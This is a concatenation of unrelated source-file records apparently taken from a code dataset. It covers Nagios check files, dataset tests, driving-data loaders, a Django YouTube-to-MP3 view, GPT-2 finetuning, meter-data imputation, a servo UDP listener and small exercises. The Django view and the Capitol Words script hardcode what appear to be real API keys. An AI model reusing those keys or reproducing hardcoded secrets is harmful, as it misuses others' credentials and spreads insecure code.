name=None, description=None, context=None,\n servicegroups=None, unit=None):\n nagios_files = self.get_local('nagios.check.files', [])\n\n if not unit:\n unit = hookenv.local_unit()\n unit = unit.replace('/', '-')\n context = self.get_remote('nagios_host_context', context)\n host_name = self.get_remote('nagios_hostname',\n '%s-%s' % (context, unit))\n\n check_tmpl = \"\"\"\n#---------------------------------------------------\n# This file is Juju managed\n#---------------------------------------------------\ncommand[%(check_name)s]=%(check_args)s\n\"\"\"\n service_tmpl = \"\"\"\n#---------------------------------------------------\n# This file is Juju managed\n#---------------------------------------------------\ndefine service {\n use active-service\n host_name %(host_name)s\n service_description %(description)s\n check_command check_nrpe!%(check_name)s\n servicegroups %(servicegroups)s\n}\n\"\"\"\n check_filename = \"/etc/nagios/nrpe.d/check_%s.cfg\" % (name)\n with open(check_filename, \"w\") as fh:\n fh.write(check_tmpl % {\n 'check_args': ' '.join(args),\n 'check_name': name,\n })\n nagios_files.append(check_filename)\n\n service_filename = \"/var/lib/nagios/export/service__%s_%s.cfg\" % (\n unit, name)\n with open(service_filename, \"w\") as fh:\n fh.write(service_tmpl % {\n 'servicegroups': servicegroups or context,\n 'context': context,\n 'description': description,\n 'check_name': name,\n 'host_name': host_name,\n 'unit_name': unit,\n })\n nagios_files.append(service_filename)\n\n self.set_local('nagios.check.files', nagios_files)\n\n def removed(self):\n files = self.get_local('nagios.check.files', [])\n for f in files:\n try:\n os.unlink(f)\n except Exception as e:\n hookenv.log(\"failed to remove %s: %s\" % (f, e))\n self.set_local('nagios.check.files', [])\n self.remove_state('{relation_name}.removed')\n\n def added(self):\n self.updated()\n\n def updated(self):\n relation_info = {\n 'timestamp': datetime.datetime.now().isoformat(),\n }\n self.set_remote(**relation_info)\n","sub_path":"provides.py","file_name":"provides.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"385788952","text":"from pathlib import Path\nimport json\nimport numpy as np\n\nfrom package.data import datasets, schemas\n\n\ndef test_read_label(tmp_path):\n label_folder = Path(tmp_path, 'label')\n label_folder.mkdir(exist_ok=True, parents=True)\n label_file = Path(label_folder, 'label.csv')\n with open(label_file, 'w') as openfile:\n openfile.write('\\n'.join(['false', 'true']))\n\n label_schema = {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"type\": \"array\",\n \"minItems\": 1,\n \"maxItems\": 1,\n \"items\": [\n {\n \"title\": \"credit__default\",\n \"type\": \"boolean\"\n }\n ],\n \"title\": \"Credit Application Outcome\"\n }\n label_schema_file = Path(tmp_path, 'label.schema.json')\n with open(label_schema_file, 'w') as openfile:\n json.dump(label_schema, openfile)\n\n schema = schemas.from_json_schema(label_schema_file)\n loaded_data = datasets.read_csv_dataset(label_folder, schema)\n assert loaded_data.shape == (2, 1)\n assert isinstance(loaded_data[0][0], np.bool_)\n assert isinstance(loaded_data[1][0], np.bool_)\n","sub_path":"sagemaker_studio/package/tests/package/data/test_datasets.py","file_name":"test_datasets.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} 
+{"seq_id":"229943660","text":"import numpy as np\nimport csv\nimport cv2\n\n# Common variables to the pipeline\nw = 64\nh = 32\nside_correction = 0.25\n\ndef toRGB(img):\n \"\"\" Needed because the image sent by the simulator is in RGB, not BGR\"\"\"\n return cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n\ndef process_img(img):\n \"\"\"image resizing to reduce data size\"\"\"\n crop = img[70:130, :]\n res = cv2.resize(crop, (w, h), interpolation=cv2.INTER_CUBIC)\n return res\n\n\ndef read_data(data_folder, samples_per_bin=100, bins=100):\n \"\"\" Helper function to select what data to use before training the networks\n It takes a data folder, max of samples per bin to to select and\n the number of bins used to balance how distributed angles are\"\"\"\n\n read_lines = []\n\n with open(data_folder + 'driving_log.csv') as csv_file:\n reader = csv.reader(csv_file)\n for line in reader:\n read_lines.append(line)\n lines = np.array(read_lines[1:])\n\n\n # Let's read all angles\n angles_list = []\n for line in lines:\n angles_list.append(float(line[3].strip()))\n angles = np.array(angles_list)\n\n # Selecting final samples to use\n hist = np.histogram(angles, bins=bins)\n used_samples = []\n # make sure extremes are included\n hist[1][-1] += 0.0000001\n bin_start = min(angles)\n # Here we try to balance the samples by setting a maximum per bin\n for bin_end in hist[1][1:]:\n selectable = np.where(np.logical_and(angles >= bin_start, angles < bin_end))\n samples_in_bin = len(angles[selectable])\n if samples_in_bin > samples_per_bin:\n idx = np.random.choice(samples_in_bin, samples_per_bin, replace=False)\n select_from = lines[selectable]\n used_samples.append(select_from[idx])\n else:\n used_samples.append((lines[selectable]))\n bin_start = bin_end\n used_samples = np.concatenate(used_samples)\n\n return used_samples\n\n\ndef get_training_data(lines, data_folder):\n \"\"\"This function takes a list or np array with a line from the log as each element, and the folder for that log\n It returns the full array of images ready for learning, and their value\"\"\"\n images_center = []\n images_left = []\n images_right = []\n measurements = []\n\n for line in lines:\n center_file = line[0].split('/')[-1]\n center_image = cv2.imread(data_folder + 'IMG/' + center_file.strip())\n images_center.append(process_img(toRGB(center_image)))\n measurements.append(float(line[3]))\n flipped = cv2.flip(center_image.copy(), 1)\n images_center.append(process_img(toRGB(flipped)))\n measurements.append(-float(line[3]))\n\n left_file = line[1].split('/')[-1]\n left_image = cv2.imread(data_folder + 'IMG/' + left_file.strip())\n images_left.append(process_img(toRGB(left_image)))\n measurements.append(float(line[3]) + side_correction)\n flipped = cv2.flip(left_image.copy(), 1)\n images_left.append(process_img(toRGB(flipped)))\n measurements.append(-(float(line[3]) + side_correction))\n\n right_file = line[2].split('/')[-1]\n right_image = cv2.imread(data_folder + 'IMG/' + right_file.strip())\n images_right.append(process_img(toRGB(right_image)))\n measurements.append(float(line[3]) - side_correction)\n flipped = cv2.flip(right_image.copy(), 1)\n images_right.append(process_img(toRGB(flipped)))\n measurements.append(-(float(line[3]) - side_correction))\n\n images = images_center + images_left + images_right\n return np.array(images), np.array(measurements)\n\n\ndef generate_train_data(train_lines, data_folder, batch_size):\n samples = batch_size // 6\n while 1:\n # shuffle samples to use\n np.random.shuffle(train_lines)\n # loop to 
use most of the data\n for i in range(0, len(train_lines) // samples):\n # select lines in this batch\n lines = train_lines[samples*i:samples*(i+1)]\n # get those sample lines and augment them\n X_train_batch, y_train_batch = get_training_data(lines, data_folder)\n yield X_train_batch, y_train_batch\n\n\ndef generate_val_data(val_lines, data_folder):\n while 1:\n # shuffle samples to use\n np.random.shuffle(val_lines)\n for line in val_lines[0:2]:\n center_file = line[0].split('/')[-1]\n center_image = cv2.imread(data_folder + 'IMG/' + center_file.strip())\n angle = np.array([[float(line[3])]])\n yield center_image[None, :, :, :], angle\n\n","sub_path":"data_adaptation.py","file_name":"data_adaptation.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"181671123","text":"from django.shortcuts import render\nfrom downloads.models import Songs, UserHistory\nfrom User.models import User\nfrom django.http import HttpResponseRedirect, Http404, HttpResponse\nimport urllib\nimport json\nimport os\nimport youtube_dl\nimport pdb\nfrom cart.models import CartItem\nfrom oauth2.views import index\n\ntry:\n from django.utils import simplejson\nexcept:\n import simplejson\n\nopt = {\n 'format': 'bestaudio/best',\n 'extractaudio': True,\n 'audioformat': \"mp3\",\n 'outtmpl': '%(id)s',\n 'noplaylist': True\n}\n\n\ndef home(request):\n if 'm_id' in request.session:\n details = index(request)\n # details = details[:9]\n user = User.objects.get(id=request.session['m_id'])\n songs = Songs.objects.all().order_by('-id')[:9]\n uc, created = CartItem.objects.get_or_create(user=user)\n if created:\n uc.save()\n csongs = uc.song.all()\n ids = []\n for song in csongs:\n ids.append(song.id)\n lp = \"https://www.youtube.com/watch?v=\"\n if 'dl' in request.GET and request.GET['dl']:\n dl = request.GET['dl']\n lb = dl.split('=')\n if len(lb) == 1:\n dl = lp + dl\n ydl = youtube_dl.YoutubeDL(opt)\n r = None\n url = dl\n cwd = os.getcwd()\n try:\n yl = Songs.objects.get(youtube_link=dl)\n yl.download_count += 1\n yl.save()\n us, created = UserHistory.objects.get_or_create(user=user)\n if created:\n us.save()\n us.song.add(yl)\n return render(request, 'home.html', {'songs': songs})\n except Songs.DoesNotExist:\n try:\n os.chdir('/home/kuliza219/django/ENV/MP3/static/Downloaded Songs')\n with ydl:\n r = ydl.extract_info(url, download=True)\n title = r['title']\n json_data = json.loads(urllib.urlopen(\"https://www.googleapis.com/youtube/v3/videos?id=%s&key=AIzaSyAauLfeOKokwDqETGYcW7ppEP81JWVq15I&part=snippet,statistics\" % r['id']).read())\n thumbnail = json_data['items'][0]['snippet']['thumbnails']['high']['url']\n # statistics = json_data['items'][0]['statistics']\n os.rename(r['id'], \"%s.mp3\" % title)\n d_link = 'Downloaded Songs' + '/' + title + \".mp3\"\n p = Songs(youtube_link=dl, local_link=d_link, title=r['title'], uploader=r['uploader'], \\\n view_count=r['view_count'], like_count=r['like_count'], unlike_count=r['dislike_count'], \\\n download_count=1, thumbnail=thumbnail)\n p.save()\n us, created = UserHistory.objects.get_or_create(user=user)\n if created:\n us.save()\n us.song.add(p)\n os.chdir(cwd)\n return render(request, 'home.html', {'songs': songs, 'name': user.first_name, 'ids': ids, 'utype': user.user_type, 'details': details})\n except Exception:\n return render(request, 'home.html', {'songs': songs, 'name': user.first_name, 'error': True, 'ids': ids, 'utype': user.user_type, 'details': details})\n else:\n 
return render(request, 'home.html', {'songs': songs, 'name': user.first_name, 'ids': ids, 'utype': user.user_type, 'details': details})\n else:\n return HttpResponseRedirect('/')\n\n\ndef temp(request):\n total_data = Songs.objects.all().count()\n user = User.objects.get(id=request.session['m_id'])\n if 'count' in request.GET and request.GET['count']:\n c = request.GET['count']\n t = int(c)\n if t-3 < total_data:\n temps = Songs.objects.all().order_by('-id')[:t]\n songs = temps[t-3:t]\n return render(request, 'temp.html', {'songs': songs, 'utype': user.user_type})\n else:\n raise Http404\n else:\n raise Http404\n\n\ndef loginhome(request):\n if 'm_id' in request.session:\n return HttpResponseRedirect('/home')\n else:\n songs = Songs.objects.all().order_by('-id')[:9]\n context = {'songs': songs}\n template = 'loginhome.html'\n return render(request, template, context)\n\n\n\ndef search(request):\n if request.is_ajax():\n search_qs = Songs.objects.filter(title__icontains=request.GET['term'])\n results = []\n for r in search_qs:\n r_json = {}\n r_json['id'] = r.id\n r_json['label'] = r.title\n r_json['value'] = r.title\n results.append(r_json)\n data = json.dumps(results)\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n else:\n songs = Songs.objects.filter(title__icontains=request.GET['search'])\n context = {'songs': songs, 'res': True}\n template = 'home.html'\n return render(request, template, context)\n\n\n\n","sub_path":"MP3/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"177880292","text":"import gpt_2_simple as gpt2\n\nmodel_name = \"774M\"\ngpt2.download_gpt2(model_name=model_name) # model is saved into current directory under /models/124M/\n\nsess = gpt2.start_tf_sess()\ngpt2.finetune(sess,\n 'cleaned_summaries.txt',\n model_name=model_name,\n multi_gpu=True,\n sample_length=140,\n sample_num=10,\n steps=10001) # steps is max number of training steps\n\n","sub_path":"gp.py","file_name":"gp.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"612391540","text":"\"\"\"\nAnomaly detection\n and fwd-bwd joint imputation\n\n2020. 10. 20. Tue.\nSoyeong Park\n\"\"\"\nfrom funcs_ETRI import *\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nfrom sklearn.metrics import confusion_matrix\n\n\n##############################\n# 0. parameter setting\ndir_data = 'D:/2020_ETRI/data' # SG_data, label data, calendar 디렉토리를 포함하고 있는 경로\nlocation = '서울' # 광주, 나주, 대전, 서울, 인천, label\ntest_apt = '1120011200'\ntest_house = 'fa7caf27'\n\nf_fwd, f_bwd = 24, 24\nnan_len = 3\n\n\n##############################\n# 1. load dataset\ndata_raw = load_apt(dir_data, location, test_apt)\ndata, nan_data = clear_head(data_raw)\ndata_col = data[test_house]\ncalendar = load_calendar(2017, 2019)\ndf = pd.DataFrame([], index=data_col.index)\ndf['values'] = data_col.copy()\ndf['holiday'] = calendar[data_col.index[0]:data_col.index[-1]]\ndf['nan'] = chk_nan_bfaf(data_col)\n\n##############################\n# 2. injection\ndf['injected'], df['mask_inj'] = inject_nan_acc3(data_col, p_nan=1, p_acc=0.25)\n\n\n##############################\n# 3. 
accumulation detection\nidx_list = np.where((df['mask_inj'] == 3) | (df['mask_inj'] == 4))[0]\nsample_list = list()\nfor i in range(len(idx_list)):\n idx_target = idx_list[i]\n sample, _, _ = nearest_neighbor(data_col, df['nan'].copy(), idx_target, calendar)\n sample_list.append(sample)\ndetect_sample = pd.DataFrame(sample_list)\n\n# 3-2. z-score\ncand = df[(df['mask_inj'] == 3) | (df['mask_inj'] == 4)].copy()\nz_score = (cand['injected'].values - detect_sample.mean(axis=1)) / detect_sample.std(axis=1)\ndf['z_score'] = pd.Series(z_score.values, index=df.index[np.where((df['mask_inj'] == 3) | (df['mask_inj'] == 4))[0]])\n\ndetection_result = pd.DataFrame([], columns=['thld', 'MAE', 'MAE_no'])\ni = 0\nfor thld in np.arange(0, 40, 0.1):\n # detection\n idx_detected_nor = np.where(((df['mask_inj'] == 3) | (df['mask_inj'] == 4)) & (df['z_score'] < thld))[0]\n idx_detected_acc = np.where(((df['mask_inj'] == 3) | (df['mask_inj'] == 4)) & (df['z_score'] > thld))[0]\n detected = np.zeros(len(data_col))\n detected[np.where((df['mask_inj'] == 3) | (df['mask_inj'] == 4))] = 3\n detected[idx_detected_acc.astype('int')] = 4\n\n # imputation\n imp_const = df['injected'].copy()\n imp_no = df['injected'].copy()\n # normal imputation - idx_detected_nor\n for idx in idx_detected_nor:\n data_inj_temp = data_col.copy()\n data_inj_temp[idx:idx+4] = df['injected'][idx:idx+4]\n mask_inj_temp = np.isnan(data_col).astype('float')\n mask_inj_temp[idx:idx+4] = df['mask_inj'][idx:idx+4]\n trn_x, trn_y, tst_x = make_bidirectional_input(data_inj_temp, mask_inj_temp)\n fcst_bidirec1, _ = linear_prediction(trn_x, trn_y, tst_x, f_len_fwd=f_fwd, f_len_bwd=f_bwd)\n imp_const[idx+1:idx+4] = fcst_bidirec1\n imp_no[idx+1:idx+4] = fcst_bidirec1\n\n # acc. imputation - idx_detected_acc\n for idx in idx_detected_acc:\n data_inj_temp = data_col.copy()\n data_inj_temp[idx:idx+4] = df['injected'][idx:idx+4]\n mask_inj_temp = np.isnan(data_col).astype('float')\n mask_inj_temp[idx:idx+4] = 2\n trn_x, trn_y, tst_x = make_bidirectional_input(data_inj_temp, mask_inj_temp)\n fcst_bidirec1, _ = linear_prediction(trn_x, trn_y, tst_x, f_len_fwd=f_fwd, f_len_bwd=f_bwd, n_len=4)\n acc = data_inj_temp[idx]\n fcst_bidirec1 = fcst_bidirec1*(acc/sum(fcst_bidirec1))\n imp_const[idx:idx+4] = fcst_bidirec1\n # acc. imputation - no constraints\n for idx in idx_detected_acc:\n data_inj_temp = data_col.copy()\n data_inj_temp[idx:idx+4] = df['injected'][idx:idx+4]\n mask_inj_temp = np.isnan(data_col).astype('float')\n mask_inj_temp[idx:idx+4] = df['mask_inj'][idx:idx+4]\n trn_x, trn_y, tst_x = make_bidirectional_input(data_inj_temp, mask_inj_temp)\n fcst_bidirec1, _ = linear_prediction(trn_x, trn_y, tst_x, f_len_fwd=f_fwd, f_len_bwd=f_bwd, n_len=3)\n imp_no[idx+1:idx+4] = fcst_bidirec1\n\n # accuracy\n temp = pd.DataFrame({'values': data_col, 'imp_const': imp_const, 'imp_no': imp_no}).dropna()\n detection_result.loc[i] = [thld,\n mean_absolute_error(temp['values'], temp['imp_const']),\n mean_absolute_error(temp['values'], temp['imp_no'])]\n i += 1\n\nplt.figure()\nplt.plot(detection_result['thld'], detection_result['MAE'])\nplt.plot(detection_result['thld'], detection_result['MAE_no'])\nplt.legend(['w/ const.', 'w/o const.'], loc='lower right')\nplt.xlabel('z-score threshold')\nplt.ylabel('total MAE')\nplt.title(f'{test_house}')\nplt.tight_layout()\nplt.show()\n\nthreshold = detection_result['thld'][detection_result['MAE']==detection_result['MAE'].min()].values[0]\nprint(f'** SELECTED THRESHOLD: {threshold}')\n\n\n# 3-3. 
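The detection step above scores each injected point by how far it sits from a sample of nearest-neighbour readings, then sweeps a z-score threshold. A standalone sketch of that test with invented numbers (the real script builds `detect_sample` from `nearest_neighbor` and sweeps thresholds from 0 to 40):

```python
import numpy as np

# z-score test as in step 3 above: compare a candidate reading against
# comparable (nearest-neighbour) readings; all values here are made up.
neighbours = np.array([1.1, 0.9, 1.0, 1.2, 0.95])
candidate = 4.8                                    # suspected accumulation point
z = (candidate - neighbours.mean()) / neighbours.std()
threshold = 3.0                                    # illustrative cut-off
print('accumulation' if z > threshold else 'normal', round(z, 2))
```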
detection\nidx_detected_nor = np.where(((df['mask_inj'] == 3) | (df['mask_inj'] == 4)) & (df['z_score'] < threshold))[0]\nidx_detected_acc = np.where(((df['mask_inj'] == 3) | (df['mask_inj'] == 4)) & (df['z_score'] > threshold))[0]\ndetected = np.zeros(len(data_col))\ndetected[np.where((df['mask_inj'] == 3) | (df['mask_inj'] == 4))] = 3\ndetected[idx_detected_acc.astype('int')] = 4\ndf['mask_detected'] = detected\n\nidx_injected = np.where((df['mask_inj'] == 3) | (df['mask_inj'] == 4))[0]\nidx_real_nor = np.where(df['mask_inj'] == 3)[0]\nidx_real_acc = np.where(df['mask_inj'] == 4)[0]\n\nidx_detected = np.isin(idx_injected, idx_detected_acc)\nidx_real = np.isin(idx_injected, idx_real_acc)\ncm = confusion_matrix(idx_real, idx_detected)\n\nplt.rcParams.update({'font.size': 14})\nplt.figure()\nsns.heatmap(cm, annot=True, fmt='d', annot_kws={'size': 20}, square=True, cmap='Greys', # 'gist_gray': reverse\n xticklabels=['normal', 'accumulation'], yticklabels=['normal', 'accumulation'])\nplt.title(f'{location}, {test_apt}, {test_house}, threshold={threshold}', fontsize=14)\nplt.xlabel('Predicted label')\nplt.ylabel('True label')\nplt.savefig(f'result/cm_{location}_{test_apt}_{test_house}.png')\nplt.show()\n\n\n##############################\n# 4. imputation\ndf['imp_const'] = df['injected'].copy()\ndf['imp_no-const'] = df['injected'].copy()\n\n# 4-1. normal imputation - idx_detected_nor\nfor idx in idx_detected_nor:\n # idx 있는 곳만 injection 남겨서 imputation\n data_inj_temp = data_col.copy()\n data_inj_temp[idx:idx+4] = df['injected'][idx:idx+4]\n mask_inj_temp = np.isnan(data_col).astype('float')\n mask_inj_temp[idx:idx+4] = df['mask_inj'][idx:idx+4]\n trn_x, trn_y, tst_x = make_bidirectional_input(data_inj_temp, mask_inj_temp)\n fcst_bidirec1, _ = linear_prediction(trn_x, trn_y, tst_x, f_len_fwd=1, f_len_bwd=1)\n df['imp_const'][idx+1:idx+4] = fcst_bidirec1\n df['imp_no-const'][idx+1:idx+4] = fcst_bidirec1\n\n# 4-2. acc. imputation - idx_detected_acc\nfor idx in idx_detected_acc:\n data_inj_temp = data_col.copy()\n # data_inj_temp[idx:idx+4] = data_inj[idx:idx+4]\n data_inj_temp[idx:idx+4] = df['injected'][idx:idx+4]\n mask_inj_temp = np.isnan(data_col).astype('float')\n mask_inj_temp[idx:idx+4] = 2\n trn_x, trn_y, tst_x = make_bidirectional_input(data_inj_temp, mask_inj_temp)\n fcst_bidirec1, _ = linear_prediction(trn_x, trn_y, tst_x, f_len_fwd=1, f_len_bwd=1, n_len=4)\n acc = data_inj_temp[idx]\n fcst_bidirec1 = fcst_bidirec1*(acc/sum(fcst_bidirec1))\n df['imp_const'][idx:idx+4] = fcst_bidirec1\n\n# 4-2-2. acc. 
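The accumulation branch above imposes a sum constraint: the bidirectional forecast for the masked window is rescaled so the imputed values add up to the accumulated meter reading (`fcst_bidirec1 * (acc / sum(fcst_bidirec1))`). A tiny self-contained illustration of that redistribution, with a hypothetical forecast:

```python
import numpy as np

# Accumulation constraint from step 4-2 above: rescale the forecast so the
# imputed window sums to the observed accumulated value `acc`.
fcst = np.array([0.8, 1.1, 0.9, 1.2])    # hypothetical 4-step bidirectional forecast
acc = 6.0                                 # accumulated reading to redistribute
fcst_scaled = fcst * (acc / fcst.sum())   # keeps the shape, fixes the total
assert np.isclose(fcst_scaled.sum(), acc)
print(fcst_scaled)
```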
imputation - no constraints\nfor idx in idx_detected_acc:\n data_inj_temp = data_col.copy()\n data_inj_temp[idx:idx+4] = df['injected'][idx:idx+4]\n mask_inj_temp = np.isnan(data_col).astype('float')\n mask_inj_temp[idx:idx+4] = df['mask_inj'][idx:idx+4]\n trn_x, trn_y, tst_x = make_bidirectional_input(data_inj_temp, mask_inj_temp)\n fcst_bidirec1, _ = linear_prediction(trn_x, trn_y, tst_x, f_len_fwd=1, f_len_bwd=1, n_len=3)\n df['imp_no-const'][idx+1:idx+4] = fcst_bidirec1\n\naccuracy_by_cases(df)","sub_path":"imputation.py","file_name":"imputation.py","file_ext":"py","file_size_in_byte":7916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"314780538","text":"import requests\nimport pprint\n\nuser_in = raw_input(\"Please enter a search term: \")\n\nquery_params = { 'apikey': 'f6ab5f2e4f69444b9f2c0a44d9a5223d',\n 'per_page': 3,\n 'phrase': user_in,\n 'sort': \"date desc\"\n }\n\nendpoint = 'http://capitolwords.org/api/text.json'\n\n\n\nresponse = requests.get(endpoint, params=query_params)\ndata = response.json()\n\ndate = data['results'][0]['date']\nname = data['results'][0]['speaker_first'] + \" \" + data['results'][0]['speaker_last']\ncontext = data['results'][0]['speaking']\n\n\nprint(\"On %s, %s said: \\n\\n\\n\\\"%s\\\"\") % (date, name, context)\n\n\n\n\n\n# documentation: http://capitolwords.org/api/1/#text.json \n# API key: 7a9c67594721496695953e94f3c0191e","sub_path":"apis_restful/capitol_words/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"210571574","text":"import sys\nimport math\n\ndef PrimeGenerator(l):\n\tlength=len(l)\n\tfor i in range(1,length,2):\n\t\tstrn=''\n\t\tN=l[i]\n\t\tif N==1:\n\t\t\tN=N+1\n\t\t\n\t\twhile N<=l[i+1]:\n\t\t\tflag=1\n\t\t\tj=2\n\t\t\twhile j<=math.sqrt(N):\n\t\t\t\t#not prime\n\t\t\t\tif N%j==0:\n\t\t\t\t\tflag=0\n\t\t\t\t\tpass\n\t\t\t\tj=j+1\n\t\t\tif flag==1:\n\t\t\t\t\t#if prime then add\n\t\t\t\t\tstrn+=str(N)+\" \"\n\t\t\t\t\n\t\t\tN=N+1\n\t\tprint(strn)\n\nstrm=''\nnum=sys.stdin.readlines()\nfor item in num:\n\tstrm+=item\nnumber=[int(x) for x in strm.split()]\nPrimeGenerator(number)\n","sub_path":"2.Python/Python Challenge/PrimeGenerator.py","file_name":"PrimeGenerator.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"609061788","text":"from numpy.random import choice\n\nclass InvalidRating(Exception):\n def __init__(self):\n print(\"\\nInvalid House rating, cannot play Quidditch at this time.\\nPlease get assigned to a house and play again..\\n\")\n\ndef quidditch(rating, points, house):\n \"\"\"\n This function selects the winner of the first game of Quidditch game based on house rating of the wizard. \n And in the second game, this function gets inputs from the wizard for catching a snitch. \n\n House points are awarded or deducted from the house in each game. 
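The `PrimeGenerator.py` record above tests divisors up to the square root of each candidate but keeps looping after a divisor is found. A standalone sketch of the same sqrt-bounded trial division with an early exit (this is an illustrative rewrite, not the original code):

```python
import math

# sqrt-bounded trial division as in PrimeGenerator.py, with an early break
# once a divisor is found (requires Python 3.8+ for math.isqrt).
def is_prime(n):
    if n < 2:
        return False
    for j in range(2, math.isqrt(n) + 1):
        if n % j == 0:
            return False          # early exit: no need to test further divisors
    return True

print([n for n in range(1, 30) if is_prime(n)])   # [2, 3, 5, ..., 29]
```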
\n    Function returns the updated house points.\n    \n    Arguments:\n    rating - (int or float) - represents the house rating of the player.\n    points - (int or float) - represents house cup points of the player's house.\n    house - (str) - represents the house of the player.\n    \"\"\" \n    if rating < 0 or rating > 1:\n        win_flag = 0\n        raise InvalidRating\n    else: \n        plus_minus = 0\n        win_flag = choice(a = [0,1], size = 1, p = [(1-rating), rating])\n        if win_flag == 1:\n            plus_minus += 10\n            print('\\nCongratulations !!!')\n            print(f\"The chasers for your house ({house}) scored the quaffle by throwing it through the hoops past the opponent's keeper.\")\n            print('You scored 10 house points!')\n            print(f'{house} house now has a total of {points + plus_minus} house cup points.')\n        else:\n            plus_minus -= 10\n            print(f\"\\nSorry, your house ({house}) beater illegally hit the opponent's seeker with their club. The referee deducts 10 points from your team.\")\n            print(f'{house} house now has a total of {points + plus_minus} house cup points.')\n        print('\\nDo you want to catch the snitch, which ends the game and awards you 150 bonus house points?')\n        user_input = input(\"Enter y to catch the snitch, or enter any other character if not interested: \") \n        if user_input.lower() == 'y': \n            print(' ')\n            print('There are five doors (1,2,3,4,5) and a snitch is in one of them. Guess where the snitch is; you can only check 2 doors.')\n            print(' ')\n            counter = 0\n            while counter < 2:\n                try:\n                    door = int(input('Enter the door number :'))\n                    counter += 1\n                    if door in [1,3,5]:\n                        plus_minus += 150\n                        print(f\"\\nCongratulations! You caught the snitch. The game is over and you get 150 bonus points! {house} house now has a total of {points + plus_minus} points.\")\n                        break\n                    else:\n                        if counter < 2:\n                            print('\\nSnitch is not here, try another door. You have one more chance\\n')\n                        else:\n                            print(f\"\\nSorry, the Snitch escaped and your opponent's seeker caught it. The game is over and you receive no bonus points.\\n\")\n                        continue\n                except ValueError:\n                    print('\\nYou must enter a valid integer 1,2,3,4,5. 
Please try again.\\n')\n continue\n return (points + plus_minus)\n else:\n print('\\nYour opponent house seeker caught the snitch and the game is over.\\n')\n return (points + plus_minus)\n","sub_path":"potterworld/sub2/quidditch.py","file_name":"quidditch.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"300831166","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport requests as req\nfrom selenium.webdriver.chrome.options import Options \n\nchrome_options = Options() \nchrome_options.add_argument(\"--headless\")\ndriver = webdriver.Chrome(chrome_options=chrome_options)\ndriver.get(\"http://www.google.com\")\nsearch = \"deep learning with python\"\ntext = search + \" filetype:pdf\"\nsearch_element = driver.find_element_by_name(\"q\")\nsearch_element.send_keys(text,Keys.ENTER)\n# print(driver.current_url)\nres_element = driver.find_elements_by_tag_name(\"a\")\n# res_element.click()\n# print(res_element)\n\nfor data in res_element:\n link = data.get_attribute(\"href\")\n len_link = len(str(link))\n if(str(link).find(\".pdf\")==len_link-4):\n # print(str(link).find(\".pdf\"))\n print(link)\n # break\n # else:\n # print(\"no pdf\")\n\n\n # print (data.get_attribute(\"href\").find())\n\n\n# results = req.get(driver.current_url)\n# source_code = results.text\n\n\n\n","sub_path":"sel.py","file_name":"sel.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"570462415","text":"import socket\nimport sys\nfrom adafruit_servokit import ServoKit\nimport time\n\nkit = ServoKit(channels=16)\n\n#UDP communication\nUDP_IP = '127.0.0.1'\nUDP_PORT = 5556\nBUFFER_SIZE = 20 \ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ns.bind((UDP_IP,UDP_PORT))\n\nwhile True:\n data, addr = s.recvfrom(1024)\n data = data.decode()\n data = data.split('\\n')[0].split(',')\n\n if(len(data) == 3):\n\n print(data[0])\n print(data[1])\n print(data[2])\n\n servo1 = float(data[0])\n servo2 = float(data[1])\n servo3 = float(data[2])\n\n kit.servo[0].angle = servo1\n kit.servo[1].angle = servo2\n kit.servo[2].angle = servo3\n","sub_path":"ServoCom.py","file_name":"ServoCom.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"524039530","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom setuptools import setup, find_packages\n\n\n__version__ = '0.1.0'\n\n\ndependencies = {}\nfor env in ('prod', 'dev'):\n requires = []\n with open('requirements/{}.txt'.format(env), encoding='utf-8') as f:\n for line in f:\n if not (line.startswith('#') or line.startswith('-r')):\n requires.append(line)\n dependencies[env] = requires\n\n\nsetup(\n name='pmps',\n version=__version__,\n packages=find_packages(),\n install_requires=dependencies['prod'],\n tests_require=dependencies['dev'],\n extras_require={\n 'dev': dependencies['dev'],\n }\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"121696778","text":"\"\"\"perfect_square\"\"\"\ndef main():\n \"\"\"your code here\"\"\"\n square = int(input())\n epsilon = 0.01\n guess = 0.0\n i = 0.0001\n num_of_guess = 0\n while abs(guess**2 - square) >= epsilon:\n guess += i\n num_of_guess += 1\n print('num_of_guess =', 
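The `ServoCom.py` record above expects ASCII UDP datagrams of the form `"angle1,angle2,angle3\n"` and drives three servos from them. A hardware-free sketch of just the wire-format parsing (the datagram contents are hypothetical):

```python
# Parsing the comma-separated datagram format ServoCom.py consumes.
def parse_angles(datagram: bytes):
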